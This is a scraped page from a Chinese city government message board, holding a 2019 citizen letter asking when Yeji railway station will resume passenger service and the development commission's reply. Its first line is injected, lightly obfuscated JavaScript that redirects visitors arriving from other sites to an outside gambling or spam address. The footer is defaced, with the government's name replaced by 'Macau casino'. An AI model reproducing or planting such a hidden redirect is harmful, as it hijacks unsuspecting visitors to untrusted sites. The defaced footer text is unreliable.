var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}
叶集火车站何时恢复客运
来信人:x**|来信时间:2019-09-20 19:18:28|处理情况:[已办结]| 督办部门:市发改委|问题类别:问题反映|浏览:808

请问叶集区火车站何时开通客运,叶集区现在人口密集好多地方在叶集买房,人流量可以达到客运要求了,叶集区位置特殊周边很多乡镇,其中包括河南省黎集镇陈淋镇等等,霍邱县,乌龙镇,户胡镇,河口镇,都辐射在叶集区,本身叶集区已经七八个镇人口非常多,每次做火车只能到金寨县非常不方便,叶集区是六安开发区应该有个火车站了,希望市政府积极响应,让叶集区更好发展

回复时间:2019-09-23 10:27:34回复单位:市发改委回复

网友您好,感谢您对六安铁路建设的关心。铁路客运的开通取决于当地客流量和途经车次,叶集火车站改造后,我委和叶集区已多次向铁路部门提出要求恢复开通叶集火车站客运,但目前尚无准确答复,具体开通时间还要取决于铁路部门。您的意见我们将继续积极向铁路部门协调呼吁,争取叶集站早日开通客运,方便群众出行。另外,途经叶集站的是宁西铁路,主要运行普速客运列车和货运列车,而您在金寨高铁站乘坐的是高铁动车,是无法在宁西铁路运行的。

此信件写信人未评价;写信人可登录后进行评价

版权所有:安徽省澳门赌场人民政府  主办:安徽省澳门赌场人民政府  承办:澳门赌场人民政府办公室
  邮编:237001  E-mail:laxxb@luan.gov.cn  电话:0564-3379979
皖ICP备11015645号-1   皖公网安备 34150102000050号   网站标识码:3415000075  
站点地图